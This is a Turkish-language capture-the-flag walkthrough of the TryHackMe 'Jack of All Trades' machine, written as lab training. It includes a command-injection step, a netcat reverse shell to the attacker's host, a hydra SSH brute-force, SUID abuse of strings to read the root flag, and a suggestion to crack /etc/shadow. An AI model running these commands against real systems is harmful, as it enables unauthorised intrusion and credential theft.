TryHackMe Jack of All Trades Makinesi Çözümü

TryHackMe Jack of All Trades Makinesi Çözümü

Merhabalar.Bugün TryHackMe platformunda yeni olarak bulunan Jack of All Trades makinesini çözeceğiz.Medium seviye olarak gözüken bir makine olmasına rağmen CTF taktikleri kullanarak hızlı bir şekilde çözülebilen bir makinedir.Hazırsak başlayalım.

İlk olarak nmap port taraması yaparak hedef sistemde bulunan port ve servisleri görüntüleyebiliriz.

sudo nmap -sS -sC -sV 10.10.247.184

Tarama sonucumuza göre 22 portunda HTTP servisi çalışmaktadır.80 portunda ise ssh portu bulunmaktadır.Ufak zıtlıklarla başlıyoruz galiba 🙂 Şimdi web tarayıcımızda bakalım makineye.


22. portumuz olan HTTP portuna bağlanıyoruz ve hata alıyoruz.Bizde proxy ayarlarımızı yapıp bağlanabiliriz.


Proxy ayarlarımızı hedef sisteme uygun şekilde yaptıktan sonra sisteme bağlanabiliriz.


Karşımıza böyle bir sayfa geldi.Gobuster ile dizin taraması yapmadan önce sayfa kaynağına göz gezdirelim diyoruz.TryHackMe CTF platformu olduğu için sayfa kaynağında veya css dosyalarında ipuçları aranabilir.


Karşımıza Base64 şifreleme türüyle şifrelenmiş metin ve bir dizin ismi geldi.Kurtarma dizini isimli dizine gidiyoruz.



recovery dizininde karşımıza bir panel geldi.Almış olduğumuz Base64’ü kıralım.


Burada bize bir parola verildi.Kullanıcı adı olarak admin ve jack gibi isimleri denesemde bulamadım.Username kısmında brute force yapmadan önce bu sayfanın da kaynak kodunu incelemeliyiz.


Burada karşımıza uzun bir Base32 şifre geldi.Yine komut satırımızdan kırabiliriz.


Şimdi de hexadecimal bir şifre geldi.Anlaşıldı ki oyun oynamak istiyor.Biz de devam edelim oyuna 🙂



Sırada ROT13 varmış.Şimdi de bunu da kıralım.


Şimdi de bize bir url verildi.Bize unutmamız panelden giriş yapmamızı istiyor.Verilen url’ye gidelim.



Gittiğimiz URL‘de karşımıza Stegosauria isimli dinazor türünün olduğu bir wikipedia sayfasına yönlendirdi.Yani ipucu olarak bizden stenografi kullanmamızı ve panele giriş yapmamızı bekliyorlar.Bizde sayfamızda bulunan resimlere göz atabiliriz.


Dikkatimiz stego.jpg çekti ilk olarak.Hemen makinemize indirip bakabiliriz.Şifre olarak da ilk kırdığımız Base64 şifrenin sonucunu girebiliriz.

steghide extract -sf stego.jpg

Bizim karşımıza creds.txt isimli dosya geldi.Okuduğumuz zaman doğru yolda olduğumuzdan ama yanlış resime baktığımızdan bahsetmektedir.Bizde diğer resimlere bakalım.


Header isimli resimde kullanıcı adı ve şifremizi bulduk.Diğer resim olan jackinthebox isimli resimde birşey bulamadık.Kullanıcı adımız ve şifremizle recovery dizininden giriş yapmayı deneyelim.


Şimdi bizden cmd parametresiyle GET isteği yapmamız isteniyor.Bizde command injection olduğunu düşünerek kontrol ediyoruz.

Hedef sistemde netcat toolu çalışığını öğrenmiş olduk.Şimdi netcat kullanarak reverse shell almayı deneyebiliriz.

/bin/nc -e /bin/bash 10.9.18.9 7878

Shell’imizi aldık.Şimdi kabuğumuzu düzenleyip home dizinine gidebiliriz.

nc -lvnp 7878
python -c 'import pty;pty.spawn("/bin/bash")'

Home dizininde karşımıza jack kullanıcısı ve bu kullanıcıya ait password listesi geldi.Bizde hydra kullanarak jack kullanıcısına brute force yapmayı deneyebiliriz.80 portu ssh olduğu için özel olarak port belirtmeyi unutmayalım :=)

hydra -l jack -P jack_password_list 10.10.247.184 ssh -s 80

Parolamızı bulduk.Şimdi sisteme giriş yapabiliriz.

ssh [email protected] -p 80

Karşımıza user.jpg isminde resim çıktı.İncelemek için kendi makinemize çekip resmi açıyoruz.

nc -w 3 10.9.18.9 6767 < user.jpg
nc -lp 6767 > user.jpg
eog user.jpg

Şimdi resmi kendi makinemize çektik.Stenografi denemeden önce resmi açalım.Zaten herhangi birşeye de gerek kalmadan şifremiz karşımızda.


Şimdiki görevimiz root olarak root flagımızı okumaktır.Sudo -l işimize yaramayınca sistemde yetkili uygulamaları görmek için find kullabiliriz.

find / -perm +6000 -type f 2>/dev/null

Burada dikkatimizi ilk olarak strings uygulaması çekti.Strings kullanarak root flag‘ımzı okuyabiliriz.

/usr/bin/strings /root/root.txt

Eğer root olmadan olmaz diyorsanız /etc/shadow dosyasındaki root parolasını kırabilirseniz root olabilirsiniz.Ben zaten flag’ı aldığımız için gerek duymadım.



Genel olarak basit bir makineydi.Okuduğunuz için teşekkür ederim.Başka yazılarda görüşmek üzere.

Related Posts

Facebook Comments